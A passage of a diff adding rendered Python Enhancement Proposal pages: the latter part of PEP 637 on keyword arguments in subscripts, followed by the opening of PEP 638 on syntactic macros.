    However, as we saw earlier, for backward compatibility a single index will be passed as is:

    +
    obj[1, foo=5]
    +# calls type(obj).__getitem__(obj, 1, foo=5)
    +
    +
    +

    In other words, a single positional index will be passed “as is” only if no sequence +unpacking is present. If a sequence unpacking is present, then the index will become a tuple, +regardless of the resulting number of elements in the index after the unpacking has taken place.

    +
  14. +
  15. Dict unpacking is permitted:
    items = {'spam': 1, 'eggs': 2}
    +obj[index, **items]
    +# equivalent to obj[index, spam=1, eggs=2]
    +
    +
    +

    The following notation equivalent should be honored:

    +
    obj[**{}]
    +# Equivalent to obj[()]
    +
    +obj[3, **{}]
    +# Equivalent to obj[3]
    +
    +
    +
  16. +
  17. Keyword-only subscripts are permitted. The positional index will be the empty tuple:
    obj[spam=1, eggs=2]
    +# calls type(obj).__getitem__(obj, (), spam=1, eggs=2)
    +
    +obj[spam=1, eggs=2] = 5
    +# calls type(obj).__setitem__(obj, (), 5, spam=1, eggs=2)
    +
    +del obj[spam=1, eggs=2]
    +# calls type(obj).__delitem__(obj, (), spam=1, eggs=2)
    +
    +
    +

    The choice of the empty tuple as a sentinel has been debated. Details are provided in +the Rejected Ideas section.

    +
  18. +
  19. Keyword arguments must allow slice syntax:
    obj[3:4, spam=1:4, eggs=2]
    +# calls type(obj).__getitem__(obj, slice(3, 4, None), spam=slice(1, 4, None), eggs=2)
    +
    +
    +

    This may open up the possibility to accept the same syntax for general function +calls, but this is not part of this recommendation.

    +
  20. +
  21. Keyword arguments allow for default values:
    # Given type(obj).__getitem__(obj, index, spam=True, eggs=2)
    +obj[3]               # Valid. index = 3, spam = True, eggs = 2
    +obj[3, spam=False]   # Valid. index = 3, spam = False, eggs = 2
    +obj[spam=False]      # Valid. index = (), spam = False, eggs = 2
    +obj[]                # Invalid.
    +
    +
    +
  22. +
  23. The same semantics given above must be extended to __class__getitem__: +Since PEP 560, type hints are dispatched so that for x[y], if no +__getitem__ method is found, and x is a type (class) object, +and x has a class method __class_getitem__, that method is +called. The same changes should be applied to this method as well, +so that a writing like list[T=int] can be accepted.
  24. +
+
+

Indexing behavior in standard classes (dict, list, etc.)

+

None of what is proposed in this PEP will change the behavior of the current +core classes that use indexing. Adding keywords to the index operation for +custom classes is not the same as modifying e.g. the standard dict type to +handle keyword arguments. In fact, dict (as well as list and other stdlib +classes with indexing semantics) will remain the same and will continue not to +accept keyword arguments. In other words, if d is a dict, the +statement d[1, a=2] will raise TypeError, as their implementation will +not support the use of keyword arguments. The same holds for all other classes +(list, dict, etc.)

+
+
+

Corner case and Gotchas

+

With the introduction of the new notation, a few corner cases need to be analysed.

+
    +
  1. Technically, if a class defines their getter like this:
    def __getitem__(self, index):
    +
    +
    +

    then the caller could call that using keyword syntax, like these two cases:

    +
    obj[3, index=4]
    +obj[index=1]
    +
    +
    +

    The resulting behavior would be an error automatically, since it would be like +attempting to call the method with two values for the index argument, and +a TypeError will be raised. In the first case, the index would be 3, +in the second case, it would be the empty tuple ().

    +

    Note that this behavior applies for all currently existing classes that rely on +indexing, meaning that there is no way for the new behavior to introduce +backward compatibility issues on this respect.

    +

    Classes that wish to stress this behavior explicitly can define their +parameters as positional-only:

    +
    def __getitem__(self, index, /):
    +
    +
    +
  2. +
  3. a similar case occurs with setter notation:
    # Given type(obj).__setitem__(obj, index, value):
    +obj[1, value=3] = 5
    +
    +
    +

    This poses no issue because the value is passed automatically, and the Python interpreter will raise +TypeError: got multiple values for keyword argument 'value'

    +
  4. +
  5. If the subscript dunders are declared to use positional-or-keyword +parameters, there may be some surprising cases when arguments are passed +to the method. Given the signature:
    def __getitem__(self, index, direction='north')
    +
    +
    +

    if the caller uses this:

    +
    obj[0, 'south']
    +
    +
    +

    they will probably be surprised by the method call:

    +
    # expected type(obj).__getitem__(obj, 0, direction='south')
    +# but actually get:
    +type(obj).__getitem__(obj, (0, 'south'), direction='north')
    +
    +
    +

    Solution: best practice suggests that keyword subscripts should be +flagged as keyword-only when possible:

    +
    def __getitem__(self, index, *, direction='north')
    +
    +
    +

    The interpreter need not enforce this rule, as there could be scenarios +where this is the desired behaviour. But linters may choose to warn +about subscript methods which don’t use the keyword-only flag.

    +
  6. +
  7. As we saw, a single value followed by a keyword argument will not be changed into a tuple, i.e.: +d[1, a=3] is treated as __getitem__(d, 1, a=3), NOT __getitem__(d, (1,), a=3). It would be +extremely confusing if adding keyword arguments were to change the type of the passed index. +In other words, adding a keyword to a single-valued subscript will not change it into a tuple. +For those cases where an actual tuple needs to be passed, a proper syntax will have to be used:
    obj[(1,), a=3]
    +# calls type(obj).__getitem__(obj, (1,), a=3)
    +
    +
    +

    In this case, the call is passing a single element (which is passed as is, as from rule above), +only that the single element happens to be a tuple.

    +

    Note that this behavior just reveals the truth that the obj[1,] notation is shorthand for +obj[(1,)] (and also obj[1] is shorthand for obj[(1)], with the expected behavior). +When keywords are present, the rule that you can omit this outermost pair of parentheses is no +longer true:

    +
    obj[1]
    +# calls type(obj).__getitem__(obj, 1)
    +
    +obj[1, a=3]
    +# calls type(obj).__getitem__(obj, 1, a=3)
    +
    +obj[1,]
    +# calls type(obj).__getitem__(obj, (1,))
    +
    +obj[(1,), a=3]
    +# calls type(obj).__getitem__(obj, (1,), a=3)
    +
    +
    +

    This is particularly relevant in the case where two entries are passed:

    +
    obj[1, 2]
    +# calls type(obj).__getitem__(obj, (1, 2))
    +
    +obj[(1, 2)]
    +# same as above
    +
    +obj[1, 2, a=3]
    +# calls type(obj).__getitem__(obj, (1, 2), a=3)
    +
    +obj[(1, 2), a=3]
    +# calls type(obj).__getitem__(obj, (1, 2), a=3)
    +
    +
    +

    And particularly when the tuple is extracted as a variable:

    +
    t = (1, 2)
    +obj[t]
    +# calls type(obj).__getitem__(obj, (1, 2))
    +
    +obj[t, a=3]
    +# calls type(obj).__getitem__(obj, (1, 2), a=3)
    +
    +
    +

    Why? because in the case obj[1, 2, a=3] we are passing two elements (which +are then packed as a tuple and passed as the index). In the case obj[(1, 2), a=3] +we are passing a single element (which is passed as is) which happens to be a tuple. +The final result is that they are the same.

    +
  8. +
+
+
+
+

C Interface

+

Resolution of the indexing operation is performed through a call to the following functions

+
    +
  • PyObject_GetItem(PyObject *o, PyObject *key) for the get operation
  • +
  • PyObject_SetItem(PyObject *o, PyObject *key, PyObject *value) for the set operation
  • +
  • PyObject_DelItem(PyObject *o, PyObject *key) for the del operation
  • +
+

These functions are used extensively within the Python executable, and are +also part of the public C API, as exported by Include/abstract.h. It is clear that +the signature of this function cannot be changed, and different C level functions +need to be implemented to support the extended call. We propose

+
    +
  • PyObject_GetItemWithKeywords(PyObject *o, PyObject *key, PyObject *kwargs)
  • +
  • PyObject_SetItemWithKeywords(PyObject *o, PyObject *key, PyObject *value, PyObject *kwargs)
  • +
  • PyObject_GetItemWithKeywords(PyObject *o, PyObject *key, PyObject *kwargs)
  • +
+

New opcodes will be needed for the enhanced call. Currently, the +implementation uses BINARY_SUBSCR, STORE_SUBSCR and DELETE_SUBSCR +to invoke the old functions. We propose BINARY_SUBSCR_KW, +STORE_SUBSCR_KW and DELETE_SUBSCR_KW for the new operations. The +compiler will have to generate these new opcodes. The +old C implementations will call the extended methods passing NULL +as kwargs.

+

Finally, the following new slots must be added to the PyMappingMethods struct:

+
    +
  • mp_subscript_kw
  • +
  • mp_ass_subscript_kw
  • +
+

These slots will have the appropriate signature to handle the dictionary object +containing the keywords.

+
+
+

“How to teach” recommendations

+

One request that occurred during feedback sessions was to detail a possible narrative +for teaching the feature, e.g. to students, data scientists, and similar audience. +This section addresses that need.

+

We will only describe the indexing from the perspective of use, not of +implementation, because it is the aspect that the above mentioned audience will +likely encounter. Only a subset of the users will have to implement their own +dunder functions, and can be considered advanced usage. A proper explanation could be:

+
+
The indexing operation is generally used to refer to a subset of a larger +dataset by means of an index. In the commonly seen cases, the index is made by +one or more numbers, strings, slices, etc.

Some types may allow indexing to occur not only with the index, but also with +named values. These named values are given between square brackets using the +same syntax used for function call keyword arguments. The meaning of the names +and their use is found in the documentation of the type, as it varies from one +type to another.

+
+

The teacher will now show some practical real world examples, explaining the +semantics of the feature in the shown library. At the time of writing these +examples do not exist, obviously, but the libraries most likely to implement +the feature are pandas and numpy, possibly as a method to refer to columns by +name.

+
+
+

Reference Implementation

+

A reference implementation is currently being developed here [6].

+
+
+

Workarounds

+

Every PEP that changes the Python language should “clearly explain why +the existing language specification is inadequate to address the +problem that the PEP solves”.

+

Some rough equivalents to the proposed extension, which we call work-arounds, +are already possible. The work-arounds provide an alternative to enabling the +new syntax, while leaving the semantics to be defined elsewhere.

+

These work-arounds follow. In them the helpers H and P are not intended to +be universal. For example, a module or package might require the use of its own +helpers.

+
    +
  1. User defined classes can be given getitem and delitem methods, +that respectively get and delete values stored in a container:
    >>> val = x.getitem(1, 2, a=3, b=4)
    +>>> x.delitem(1, 2, a=3, b=4)
    +
    +
    +

    The same can’t be done for setitem. It’s not valid syntax:

    +
    >>> x.setitem(1, 2, a=3, b=4) = val
    +SyntaxError: can't assign to function call
    +
    +
    +
  2. +
  3. A helper class, here called H, can be used to swap the container +and parameter roles. In other words, we use:
    H(1, 2, a=3, b=4)[x]
    +
    +
    +

    as a substitute for:

    +
    x[1, 2, a=3, b=4]
    +
    +
    +

    This method will work for getitem, delitem and also for +setitem. This is because:

    +
    >>> H(1, 2, a=3, b=4)[x] = val
    +
    +
    +

    is valid syntax, which can be given the appropriate semantics.

    +
  4. +
  5. A helper function, here called P, can be used to store the +arguments in a single object. For example:
    >>> x[P(1, 2, a=3, b=4)] = val
    +
    +
    +

    is valid syntax, and can be given the appropriate semantics.

    +
  6. +
  7. The lo:hi:step syntax for slices is sometimes very useful. This +syntax is not directly available in the work-arounds. However:
    s[lo:hi:step]
    +
    +
    +

    provides a work-around that is available everything, where:

    +
    class S:
    +    def __getitem__(self, key): return key
    +
    +s = S()
    +
    +
    +

    defines the helper object s.

    +
  8. +
+
+
+

Rejected Ideas

+
+

Previous PEP 472 solutions

+

PEP 472 presents a good amount of ideas that are now all to be considered +Rejected. A personal email from D’Aprano to the author specifically said:

+
+
I have now carefully read through PEP 472 in full, and I am afraid I +cannot support any of the strategies currently in the PEP.
+

We agree that those options are inferior to the currently presented, for one +reason or another.

+

To keep this document compact, we will not present here the objections for +all options presented in PEP 472. Suffice to say that they were discussed, +and each proposed alternative had one or few dealbreakers.

+
+
+

Adding new dunders

+

It was proposed to introduce new dunders __(get|set|del)item_ex__ +that are invoked over the __(get|set|del)item__ triad, if they are present.

+

The rationale around this choice is to make the intuition around how to add kwd +arg support to square brackets more obvious and in line with the function +behavior. Given:

+
def __getitem_ex__(self, x, y): ...
+
+
+

These all just work and produce the same result effortlessly:

+
obj[1, 2]
+obj[1, y=2]
+obj[y=2, x=1]
+
+
+

In other words, this solution would unify the behavior of __getitem__ to the traditional +function signature, but since we can’t change __getitem__ and break backward compatibility, +we would have an extended version that is used preferentially.

+

The problems with this approach were found to be:

+
    +
  • It will slow down subscripting. For every subscript access, this new dunder +attribute gets investigated on the class, and if it is not present then the +default key translation function is executed. +Different ideas were proposed to handle this, from wrapping the method +only at class instantiation time, to add a bit flag to signal the availability +of these methods. Regardess of the solution, the new dunder would be effective +only if added at class creation time, not if it’s added later. This would +be unusual and would disallow (and behave unexpectedly) monkeypatching of the +methods for whatever reason it might be needed.
  • +
  • It adds complexity to the mechanism.
  • +
  • Will require a long and painful transition period during which time +libraries will have to somehow support both calling conventions, because most +likely, the extended methods will delegate to the traditional ones when the +right conditions are matched in the arguments, or some classes will support +the traditional dunder and others the extended dunder. While this will not +affect calling code, it will affect development.
  • +
  • it would potentially lead to mixed situations where the extended version is +defined for the getter, but not for the setter.
  • +
  • In the __setitem_ex__ signature, value would have to be made the first +element, because the index is of arbitrary length depending on the specified +indexes. This would look awkward because the visual notation does not match +the signature:
    obj[1, 2] = 3
    +# calls type(obj).__setitem_ex__(obj, 3, 1, 2)
    +
    +
    +
  • +
  • the solution relies on the assumption that all keyword indices necessarily map +into positional indices, or that they must have a name. This assumption may be +false: xarray, which is the primary Python package for numpy arrays with +labelled dimensions, supports indexing by additional dimensions (so called +“non-dimension coordinates”) that don’t correspond directly to the dimensions +of the underlying numpy array, and those have no position to match up to. +In other words, anonymous indexes are a plausible use case that this solution +would remove, although it could be argued that using *args would solve +that issue.
  • +
+
+
+

Adding an adapter function

+

Similar to the above, in the sense that a pre-function would be called to +convert the “new style” indexing into “old style indexing” that is then passed. +Has problems similar to the above.

+
+
+

create a new “kwslice” object

+

This proposal has already been explored in “New arguments contents” P4 in PEP 472:

+
obj[a, b:c, x=1]
+# calls type(obj).__getitem__(obj, a, slice(b, c), key(x=1))
+
+
+

This solution requires everyone who needs keyword arguments to parse the tuple +and/or key object by hand to extract them. This is painful and opens up to the +get/set/del function to always accept arbitrary keyword arguments, whether they +make sense or not. We want the developer to be able to specify which arguments +make sense and which ones do not.

+
+
+

Using a single bit to change the behavior

+

A special class dunder flag:

+
__keyfn__ = True
+
+
+

would change the signature of the __get|set|delitem__ to a “function like” dispatch, +meaning that this:

+
>>> d[1, 2, z=3]
+
+
+

would result in a call to:

+
>>> type(obj).__getitem__(obj, 1, 2, z=3)
+# instead of type(obj).__getitem__(obj, (1, 2), z=3)
+
+
+

This option has been rejected because it feels odd that a signature of a method +depends on a specific value of another dunder. It would be confusing for both +static type checkers and for humans: a static type checker would have to hard-code +a special case for this, because there really is nothing else in Python +where the signature of a dunder depends on the value of another dunder. +A human that has to implement a __getitem__ dunder would have to look if in the +class (or in any of its subclasses) for a __keyfn__ before the dunder can be written. +Moreover, adding a base classes that have the __keyfn__ flag set would break +the signature of the current methods. This would be even more problematic if the +flag is changed at runtime, or if the flag is generated by calling a function +that returns randomly True or something else.

+
+
+

Allowing for empty index notation obj[]

+

The current proposal prevents obj[] from being valid notation. However +a commenter stated

+
+
We have Tuple[int, int] as a tuple of two integers. And we have Tuple[int] +as a tuple of one integer. And occasionally we need to spell a tuple of no +values, since that’s the type of (). But we currently are forced to write +that as Tuple[()]. If we allowed Tuple[] that odd edge case would be +removed.

So I probably would be okay with allowing obj[] syntactically, as long as the +dict type could be made to reject it.

+
+

This proposal already established that, in case no positional index is given, the +passed value must be the empty tuple. Allowing for the empty index notation would +make the dictionary type accept it automatically, to insert or refer to the value with +the empty tuple as key. Moreover, a typing notation such as Tuple[] can easily +be written as Tuple without the indexing notation.

+

However, subsequent discussion with Brandt Bucher during implementation has revealed +that the case obj[] would fit a natural evolution for variadic generics, giving +more strength to the above comment. In the end, after a discussion between D’Aprano, +Bucher and the author, we decided to leave the obj[] notation as a syntax +error for now, and possibly extend the notation with an additional PEP to hold +the equivalence obj[] as obj[()].

+
+
+

Sentinel value for no given positional index

+

The topic of which value to pass as the index in the case of:

+
obj[k=3]
+
+
+

has been considerably debated.

+

One apparently rational choice would be to pass no value at all, by making use of +the keyword only argument feature, but unfortunately will not work well with +the __setitem__ dunder, as a positional element for the value is always +passed, and we can’t “skip over” the index one unless we introduce a very weird behavior +where the first argument refers to the index when specified, and to the value when +index is not specified. This is extremely deceiving and error prone.

+

The above consideration makes it impossible to have a keyword only dunder, and +opens up the question of what entity to pass for the index position when no index +is passed:

+
obj[k=3] = 5
+# would call type(obj).__setitem__(obj, ???, 5, k=3)
+
+
+

A proposed hack would be to let the user specify which entity to use when an +index is not specified, by specifying a default for the index, but this +forces necessarily to also specify a (never going to be used, as a value is +always passed by design) default for the value, as we can’t have +non-default arguments after defaulted one:

+
def __setitem__(self, index=SENTINEL, value=NEVERUSED, *, k)
+
+
+

which seems ugly, redundant and confusing. We must therefore accept that some +form of sentinel index must be passed by the Python implementation when the +obj[k=3] notation is used. This also means that default arguments to those +parameters are simply never going to be used (but it’s already the +case with the current implementation, so no change there).

+

Additionally, some classes may want to use **kwargs, instead of a keyword-only +argument, meaning that having a definition like:

+
def __setitem__(self, index, value, **kwargs):
+
+
+

and a user that wants to pass a keyword value:

+
x[value=1] = 0
+
+
+

expecting a call like:

+
type(obj).__setitem__(obj, SENTINEL, 0, **{"value": 1})
+
+
+

will instead accidentally be caught by the named value, producing a +duplicate value error. The user should not be worried about the actual +local names of those two arguments if they are, for all practical purposes, +positional only. Unfortunately, using positional-only values will ensure this +does not happen but it will still not solve the need to pass both index and +value even when the index is not provided. The point is that the user should not +be prevented to use keyword arguments to refer to a column index, value +(or self) just because the class implementor happens to use those names +in the parameter list.

+

Moreover, we also require the three dunders to behave in the same way: it would +be extremely inconvenient if only __setitem__ were to receive this +sentinel, and __get|delitem__ would not because they can get away with a +signature that allows for no index specification, thus allowing for a +user-specified default index.

+

Whatever the choice of the sentinel, it will make the following cases +degenerate and thus impossible to differentiate in the dunder:

+
obj[k=3]
+obj[SENTINEL, k=3]
+
+
+

The question now shifts to which entity should represent the sentinel: +the options were:

+
    +
  1. Empty tuple
  2. +
  3. None
  4. +
  5. NotImplemented
  6. +
  7. a new sentinel object (e.g. NoIndex)
  8. +
+

For option 1, the call will become:

+
type(obj).__getitem__(obj, (), k=3)
+
+
+

therefore making obj[k=3] and obj[(), k=3] degenerate and indistinguishable.

+

This option sounds appealing because:

+
    +
  1. The numpy community was inquired [5], and the general consensus +of the responses was that the empty tuple felt appropriate.
  2. +
  3. It shows a parallel with the behavior of *args in a function, when +no positional arguments are given:
    >>> def foo(*args, **kwargs):
    +...     print(args, kwargs)
    +...
    +>>> foo(k=3)
    +() {'k': 3}
    +
    +
    +

    Although we do accept the following asymmetry in behavior compared to functions +when a single value is passed, but that ship has sailed:

    +
    >>> foo(5, k=3)
    +(5,) {'k': 3}   # for indexing, a plain 5, not a 1-tuple is passed
    +
    +
    +
  4. +
+

For option 2, using None, it was objected that NumPy uses it to indicate +inserting a new axis/dimensions (there’s a np.newaxis alias as well):

+
arr = np.array(5)
+arr.ndim == 0
+arr[None].ndim == arr[None,].ndim == 1
+
+
+

While this is not an insurmountable issue, it certainly will ripple onto numpy.

+

The only issues with both the above is that both the empty tuple and None are +potential legitimate indexes, and there might be value in being able to differentiate +the two degenerate cases.

+

So, an alternative strategy (option 3) would be to use an existing entity that is +unlikely to be used as a valid index. One option could be the current built-in constant +NotImplemented, which is currently returned by operators methods to +report that they do not implement a particular operation, and a different strategy +should be attempted (e.g. to ask the other object). Unfortunately, its name and +traditional use calls back to a feature that is not available, rather than the +fact that something was not passed by the user.

+

This leaves us with option 4: a new built-in constant. This constant +must be unhashable (so it’s never going to be a valid key) and have a clear +name that makes it obvious its context: NoIndex. This +would solve all the above issues, but the question is: is it worth it?

+

From a quick inquire, it seems that most people on python-ideas seem to believe +it’s not crucial, and the empty tuple is an acceptable option. Hence the +resulting series will be:

+
obj[k=3]
+# type(obj).__getitem__(obj, (), k=3). Empty tuple
+
+obj[1, k=3]
+# type(obj).__getitem__(obj, 1, k=3). Integer
+
+obj[1, 2, k=3]
+# type(obj).__getitem__(obj, (1, 2), k=3). Tuple
+
+
+

and the following two notation will be degenerate:

+
obj[(), k=3]
+# type(obj).__getitem__(obj, (), k=3)
+
+obj[k=3]
+# type(obj).__getitem__(obj, (), k=3)
+
+
+
+
+
+

Common objections

+
    +
  1. Just use a method call.

    One of the use cases is typing, where the indexing is used exclusively, and +function calls are out of the question. Moreover, function calls do not handle +slice notation, which is commonly used in some cases for arrays.

    +

    One problem is type hint creation has been extended to built-ins in Python 3.9, +so that you do not have to import Dict, List, et al anymore.

    +

    Without kwdargs inside [], you would not be able to do this:

    +
    Vector = dict[i=float, j=float]
    +
    +
    +

    but for obvious reasons, call syntax using builtins to create custom type hints +isn’t an option:

    +
    dict(i=float, j=float)
    +# would create a dictionary, not a type
    +
    +
    +

    Finally, function calls do not allow for a setitem-like notation, as shown +in the Overview: operations such as f(1, x=3) = 5 are not allowed, and are +instead allowed for indexing operations.

    +
  2. +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0637.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0638/index.html b/pep-0638/index.html new file mode 100644 index 00000000000..b444cc1d221 --- /dev/null +++ b/pep-0638/index.html @@ -0,0 +1,687 @@ + + + + + + + + PEP 638 – Syntactic Macros | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 638 – Syntactic Macros

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
Discussions-To:
+
Python-Dev thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
24-Sep-2020
+
Post-History:
+
26-Sep-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP adds support for syntactic macros to Python. +A macro is a compile-time function that transforms +a part of the program to allow functionality that cannot be +expressed cleanly in normal library code.

+

The term “syntactic” means that this sort of macro operates on the program’s +syntax tree. This reduces the chance of mistranslation that can happen +with text-based substitution macros, and allows the implementation +of hygienic macros.

+

Syntactic macros allow libraries to modify the abstract syntax tree during compilation, +providing the ability to extend the language for specific domains without +adding to complexity to the language as a whole.

+
+
+

Motivation

+

New language features can be controversial, disruptive and sometimes divisive. +Python is now sufficiently powerful and complex, that many proposed additions +are a net loss for the language due to the additional complexity.

+

Although a language change may make certain patterns easy to express, +it will have a cost. Each new feature makes the language larger, +harder to learn and harder to understand. +Python was once described as Python Fits Your Brain, +but that becomes less and less true as more and more features are added.

+

Because of the high cost of adding a new feature, +it is very difficult or impossible to add a feature that would benefit only +some users, regardless of how many users, or how beneficial that feature would +be to them.

+

The use of Python in data science and machine learning has grown very rapidly +over the last few years. +However, most of the core developers of Python do not have a background in +data science or machine learning. +This makes it extremely difficult for the core developers to determine whether a +language extension for machine learning is worthwhile.

+

By allowing language extensions to be modular and distributable, like libraries, +domain-specific extensions can be implemented without negatively impacting +users outside of that domain. +A web developer is likely to want a very different set of extensions from +a data scientist. +We need to let the community develop their own extensions.

+

Without some form of user-defined language extensions, +there will be a constant battle between those wanting to keep the +language compact and fitting their brains, and those wanting a new feature +that suits their domain or programming style.

+
+

Improving the expressiveness of libraries for specific domains

+

Many domains see repeated patterns that are difficult or impossible +to express as a library. +Macros can express those patterns in a more concise and less error-prone way.

+
+
+

Trialing new language features

+

It is possible to demonstrate potential language extensions using macros. +For example, macros would have enabled the with statement and +yield from expression to have been trialed. +Doing so might well have lead to a higher quality implementation +at first release, by allowing more testing +before those features were included in the language.

+

It is nearly impossible to make sure that a new feature is completely reliable +before it is released; bugs relating to the with and yield from +features were still being fixed many years after they were released.

+
+
+

Long term stability for the bytecode interpreter

+

Historically, new language features have been implemented by naive compilation +of the AST into new, complex bytecode instructions. +Those bytecodes have often had their own internal flow-control, performing +operations that could, and should, have been done in the compiler.

+

For example, +until recently flow control within the try-finally and with +statements was managed by complicated bytecodes with context-dependent semantics. +The control flow within those statements is now implemented in the compiler, making +the interpreter simpler and faster.

+

By implementing new features as AST transformations, the existing compiler can +generate the bytecode for a feature without having to modify the interpreter.

+

A stable interpreter is necessary if we are to improve the performance and +portability of the CPython VM.

+
+
+
+

Rationale

+

Python is both expressive and easy to learn; +it is widely recognized as the easiest-to-learn, widely used programming language. +However, it is not the most flexible. That title belongs to lisp.

+

Because lisp is homoiconic, meaning that lisp programs are lisp data structures, +lisp programs can be manipulated by lisp programs. +Thus much of the language can be defined in itself.

+

We would like that ability in Python, +without the many parentheses that characterize lisp. +Fortunately, homoiconicity is not needed for a language to be able to +manipulate itself, all that is needed is the ability to manipulate programs +after parsing, but before translation to an executable form.

+

Python already has the components needed. +The syntax tree of Python is available through the ast module. +All that is needed is a marker to tell the compiler that a macro is present, +and the ability for the compiler to callback into user code to manipulate the AST.

+
+
+

Specification

+
+

Syntax

+
+

Lexical analysis

+

Any sequence of identifier characters followed by an exclamation point +(exclamation mark, UK English) will be tokenized as a MACRO_NAME.

+
+
+

Statement form

+
macro_stmt = MACRO_NAME testlist [ "import" NAME ] [ "as"  NAME ] [ ":" NEWLINE suite ]
+
+
+
+
+

Expression form

+
macro_expr = MACRO_NAME "(" testlist ")"
+
+
+
+
+

Resolving ambiguity

+

The statement form of a macro takes precedence, so that the code +macro_name!(x) will be parsed as a macro statement, +not as an expression statement containing a macro expression.

+
+
+
+

Semantics

+
+

Compilation

+

Upon encountering a macro during translation to bytecode, +the code generator will look up the macro processor registered for the macro, +and pass the AST rooted at the macro to the processor function. +The returned AST will then be substituted for the original tree.

+

For macros with multiple names, +several trees will be passed to the macro processor, +but only one will be returned and substituted, +shorting the enclosing block of statements.

+

This process can be repeated, +to enable macros to return AST nodes including other macros.

+

The compiler will not look up a macro processor until that macro is reached, +so that inner macros do not need to have processors registered. +For example, in a switch macro, the case and default macros wouldn’t +need processors registered as they would be eliminated by the switch processor.

+

To enable definition of macros to be imported, +the macros import! and from! are predefined. +They support the following syntax:

+
"import!" dotted_name "as" name
+
+"from!" dotted_name "import" name [ "as" name ]
+
+
+

The import! macro performs a compile-time import of dotted_name +to find the macro processor, then registers it under name +for the scope currently being compiled.

+

The from! macro performs a compile-time import of dotted_name.name +to find the macro processor, then registers it under name +(using the name following “as”, if present) +for the scope currently being compiled.

+

Note that, since import! and from! only define the macro for the +scope in which the import is present, all uses of a macro must be preceded by +an explicit import! or from! to improve clarity.

+

For example, to import the macro “compile” from “my.compiler”:

+
from! my.compiler import compile
+
+
+
+
+

Defining macro processors

+

A macro processor is defined by a four-tuple, consisting of +(func, kind, version, additional_names):

+
    +
  • func must be a callable that takes len(additional_names)+1 arguments, all of which are abstract syntax trees, and returns a single abstract syntax tree.
  • +
  • kind must be one of the following:
      +
    • macros.STMT_MACRO: A statement macro where the body of the macro is indented. This is the only form allowed to have additional names.
    • +
    • macros.SIBLING_MACRO: A statement macro where the body of the macro is the next statement in the same block. The following statement is moved into the macro as its body.
    • +
    • macros.EXPR_MACRO: An expression macro.
    • +
    +
  • +
  • version is used to track versions of macros, so that generated bytecodes can be correctly cached. It must be an integer.
  • +
  • additional_names are the names of the additional parts of the macro, and must be a tuple of strings.
  • +
+
# (func, _ast.STMT_MACRO, VERSION, ())
+stmt_macro!:
+    multi_statement_body
+
+# (func, _ast.SIBLING_MACRO, VERSION, ())
+sibling_macro!
+single_statement_body
+
+# (func, _ast.EXPR_MACRO, VERSION, ())
+x = expr_macro!(...)
+
+# (func, _ast.STMT_MACRO, VERSION, ("subsequent_macro_part",))
+multi_part_macro!:
+    multi_statement_body
+subsequent_macro_part!:
+    multi_statement_body
+
+
+

The compiler will check that the syntax used matches the declared kind.

+

For convenience, the decorator macro_processor is provided in the macros module to mark a function as a macro processor:

+
def macro_processor(kind, version, *additional_names):
+    def deco(func):
+        return func, kind, version, additional_names
+    return deco
+
+
+

Which can be used to help declare macro processors, for example:

+
@macros.macro_processor(macros.STMT_MACRO, 1_08)
+def switch(astnode):
+    ...
+
+
+
+
+

AST extensions

+

Two new AST nodes will be needed to express macros, macro_stmt and macro_expr.

+
class macro_stmt(_ast.stmt):
+    _fields = "name", "args", "importname", "asname", "body"
+
+class macro_expr(_ast.expr):
+    _fields = "name", "args"
+
+
+

In addition, macro processors will need a means to express control flow or side-effecting code, that produces a value. +A new AST node called stmt_expr will be added, combining a statement and an expression. +This new ast node will be a subtype of expr, but include a statement to allow side effects. +It will be compiled to bytecode by compiling the statement, then compiling the value.

+
class stmt_expr(_ast.expr):
+    _fields = "stmt", "value"
+
+
+
+
+

Hygiene and debugging

+

Macro processors will often need to create new variables. +Those variables need to named in such as way as to avoid contaminating the original code and other macros. +No rules for naming will be enforced, but to ensure hygiene and help debugging, the following naming scheme is recommended:

+
    +
  • All generated variable names should start with a $
  • +
  • Purely artificial variable names should start $$mname where mname is the name of the macro.
  • +
  • Variables derived from real variables should start $vname where vname is the name of the variable.
  • +
  • All variable names should include the line number and the column offset, separated by an underscore.
  • +
+

Examples:

+
    +
  • Purely generated name: $$macro_17_0
  • +
  • Name derived from a variable for an expression macro: $var_12_5
  • +
+
+
+
+

Examples

+
+

Compile-time-checked data structures

+

It is common to encode tables of data in Python as large dictionaries. +However, these can be hard to maintain and error prone. +Macros allow such data to be written in a more readable format. +Then, at compile time, the data can be verified and converted to an efficient format.

+

For example, suppose we have a two dictionary literals mapping codes to names, +and vice versa. +This is error prone, as the dictionaries may have duplicate keys, +or one table may not be the inverse of the other. +A macro could generate the two mappings from a single table and, +at the same time, verify that no duplicates are present.

+
color_to_code = {
+    "red": 1,
+    "blue": 2,
+    "green": 3,
+}
+
+code_to_color = {
+    1: "red",
+    2: "blue",
+    3: "yellow", # error
+}
+
+
+

would become:

+
bijection! color_to_code, code_to_color:
+    "red" = 1
+    "blue" = 2
+    "green" = 3
+
+
+
+
+

Domain-specific extensions

+

Where I see macros having real value is in specific domains, not in general-purpose language features.

+

For example, parsers. +Here’s part of a parser definition for Python, using macros:

+
choice! single_input:
+    NEWLINE
+    simple_stmt
+    sequence!:
+        compound_stmt
+        NEWLINE
+
+
+
+
+

Compilers

+

Runtime compilers, such as numba have to reconstitute the Python source, or attempt to analyze the bytecode. +It would be simpler and more reliable for them to get the AST directly:

+
from! my.jit.library import jit
+
+jit!
+def func():
+    ...
+
+
+
+
+

Matching symbolic expressions

+

When matching something representing syntax, such a Python ast node, or a sympy expression, +it is convenient to match against the actual syntax, not the data structure representing it. +For example, a calculator could be implemented using a domain-specific macro for matching syntax:

+
from! ast_matcher import match
+
+def calculate(node):
+    if isinstance(node, Num):
+        return node.n
+    match! node:
+        case! a + b:
+            return calculate(a) + calculate(b)
+        case! a - b:
+            return calculate(a) - calculate(b)
+        case! a * b:
+            return calculate(a) * calculate(b)
+        case! a / b:
+            return calculate(a) / calculate(b)
+
+
+

Which could be converted to:

+
def calculate(node):
